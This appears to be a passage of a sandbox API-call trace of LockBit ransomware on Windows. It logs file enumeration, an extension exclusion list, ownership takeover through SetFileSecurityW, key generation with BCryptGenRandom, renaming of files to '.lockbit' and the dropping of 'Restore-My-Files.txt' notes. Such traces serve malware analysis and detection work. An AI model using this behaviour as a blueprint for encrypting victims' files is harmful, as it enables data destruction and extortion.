PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy") returned 1 [0079.112] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt") returned 73 [0079.112] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.112] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70e4fd82, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70e4fd82, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49eb515f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2279e, dwReserved0=0x0, dwReserved1=0x0, cFileName="BabyBoyMainToScenesBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0079.112] lstrcmpiW (lpString1=".", lpString2="BabyBoyMainToScenesBackground_PAL.wmv") returned -1 [0079.112] lstrcmpiW (lpString1="..", lpString2="BabyBoyMainToScenesBackground_PAL.wmv") returned -1 [0079.112] PathFindExtensionW (pszPath="BabyBoyMainToScenesBackground_PAL.wmv") returned=".wmv" [0079.112] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0079.112] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0079.112] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0079.112] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0079.112] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0079.112] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0079.112] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0079.112] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0079.113] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0079.113] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0079.113] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0079.113] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0079.113] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0079.113] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0079.113] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0079.113] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0079.113] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0079.113] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0079.113] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0079.113] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0079.113] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0079.113] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0079.113] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0079.113] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0079.113] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.113] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0079.113] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0079.113] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0079.113] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0079.113] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0079.113] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0079.113] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0079.113] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0079.113] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0079.113] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0079.113] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0079.113] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0079.113] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0079.114] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0079.114] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0079.114] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0079.114] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0079.114] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.114] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0079.114] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0079.114] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0079.114] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0079.114] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BabyBoyMainToScenesBackground_PAL.wmv") returned 1 [0079.114] lstrcmpiW (lpString1="ntldr", lpString2="BabyBoyMainToScenesBackground_PAL.wmv") returned 1 [0079.114] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BabyBoyMainToScenesBackground_PAL.wmv") returned 1 [0079.114] lstrcmpiW (lpString1="bootsect.bak", lpString2="BabyBoyMainToScenesBackground_PAL.wmv") returned 1 [0079.114] lstrcmpiW (lpString1="autorun.inf", lpString2="BabyBoyMainToScenesBackground_PAL.wmv") returned -1 [0079.114] lstrcmpiW (lpString1="thumbs.db", lpString2="BabyBoyMainToScenesBackground_PAL.wmv") returned 1 [0079.114] lstrcmpiW (lpString1="iconcache.db", lpString2="BabyBoyMainToScenesBackground_PAL.wmv") returned 1 [0079.114] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\") returned="" [0079.114] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground_PAL.wmv") returned=".wmv" [0079.114] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0079.114] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0079.114] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0079.114] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0079.114] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0079.114] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0079.114] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0079.114] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0079.114] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0079.114] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0079.114] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0079.114] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0079.115] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0079.115] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0079.115] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0079.115] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0079.115] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0079.115] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0079.115] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0079.115] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0079.115] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0079.115] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0079.115] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0079.115] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0079.115] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0079.115] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0079.115] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0079.115] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0079.115] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground_PAL.wmv.lockbit") returned 98 [0079.115] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintoscenesbackground_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.115] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.116] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.116] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.116] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.116] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.116] RtlFreeAnsiString (AnsiString="\\") [0079.116] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3ac) returned 0x0 [0079.116] malloc (_Size=0x200) returned 0x77d800 [0079.116] NtQueryInformationToken (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.116] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.116] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.116] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground_PAL.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.117] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground_PAL.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.117] CloseHandle (hObject=0x3ac) returned 1 [0079.117] free (_Block=0x77d800) [0079.117] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintoscenesbackground_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0079.117] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.117] malloc (_Size=0x40068) returned 0x1ff1e60 [0079.118] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=141214) returned 1 [0079.118] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.118] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0079.118] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.119] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0079.119] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0079.124] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground_PAL.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground_PAL.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.124] malloc (_Size=0xda) returned 0x77d800 [0079.124] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xda, FileInformationClass=0xa) returned 0x0 [0079.124] free (_Block=0x77d800) [0079.124] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground_PAL.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy") returned 1 [0079.124] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt") returned 73 [0079.124] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.124] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70ec2199, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70ec2199, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49edb2bd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2666c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BabyBoyNotesBackground.wmv", cAlternateFileName="")) returned 1 [0079.125] lstrcmpiW (lpString1=".", lpString2="BabyBoyNotesBackground.wmv") returned -1 [0079.125] lstrcmpiW (lpString1="..", lpString2="BabyBoyNotesBackground.wmv") returned -1 [0079.125] PathFindExtensionW (pszPath="BabyBoyNotesBackground.wmv") returned=".wmv" [0079.125] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0079.125] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0079.125] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0079.125] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0079.125] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0079.125] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0079.125] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0079.125] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0079.125] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0079.125] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0079.125] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0079.125] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0079.125] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0079.125] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0079.125] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0079.125] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0079.125] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0079.125] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0079.125] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0079.125] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0079.125] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0079.126] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0079.126] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0079.126] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0079.126] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.126] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0079.126] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0079.126] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0079.126] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0079.126] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0079.126] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0079.126] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0079.126] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0079.126] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0079.126] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0079.126] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0079.126] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0079.126] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0079.126] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0079.126] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0079.126] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0079.126] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0079.126] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.126] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0079.127] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0079.127] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0079.127] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0079.127] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BabyBoyNotesBackground.wmv") returned 1 [0079.127] lstrcmpiW (lpString1="ntldr", lpString2="BabyBoyNotesBackground.wmv") returned 1 [0079.127] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BabyBoyNotesBackground.wmv") returned 1 [0079.127] lstrcmpiW (lpString1="bootsect.bak", lpString2="BabyBoyNotesBackground.wmv") returned 1 [0079.127] lstrcmpiW (lpString1="autorun.inf", lpString2="BabyBoyNotesBackground.wmv") returned -1 [0079.127] lstrcmpiW (lpString1="thumbs.db", lpString2="BabyBoyNotesBackground.wmv") returned 1 [0079.127] lstrcmpiW (lpString1="iconcache.db", lpString2="BabyBoyNotesBackground.wmv") returned 1 [0079.127] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\") returned="" [0079.127] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground.wmv") returned=".wmv" [0079.127] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0079.127] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0079.127] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0079.127] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0079.127] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0079.127] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0079.127] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0079.127] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0079.127] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0079.127] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0079.127] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0079.128] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0079.128] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0079.128] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0079.128] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0079.128] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0079.128] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0079.128] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0079.128] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0079.128] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0079.128] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0079.128] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0079.128] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0079.128] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0079.128] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0079.128] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0079.128] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0079.128] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0079.128] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground.wmv.lockbit") returned 87 [0079.128] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboynotesbackground.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.129] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.129] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.129] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.129] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.129] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.130] RtlFreeAnsiString (AnsiString="\\") [0079.130] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0079.130] malloc (_Size=0x200) returned 0x77d800 [0079.130] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.130] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.130] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.130] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.130] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.130] CloseHandle (hObject=0x3b8) returned 1 [0079.130] free (_Block=0x77d800) [0079.130] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboynotesbackground.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0079.131] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.131] malloc (_Size=0x40068) returned 0x2031ed0 [0079.132] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x2031ee8 | out: lpFileSize=0x2031ee8*=157292) returned 1 [0079.132] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.132] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f04, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f04) returned 0x0 [0079.132] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.133] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.133] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f14, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f14) returned 0x0 [0079.133] ReadFile (in: hFile=0x3b8, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 0x0 [0079.144] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.144] malloc (_Size=0xc4) returned 0x77d800 [0079.144] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc4, FileInformationClass=0xa) returned 0x0 [0079.146] free (_Block=0x77d800) [0079.146] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy") returned 1 [0079.146] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt") returned 73 [0079.146] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt" (normalized: 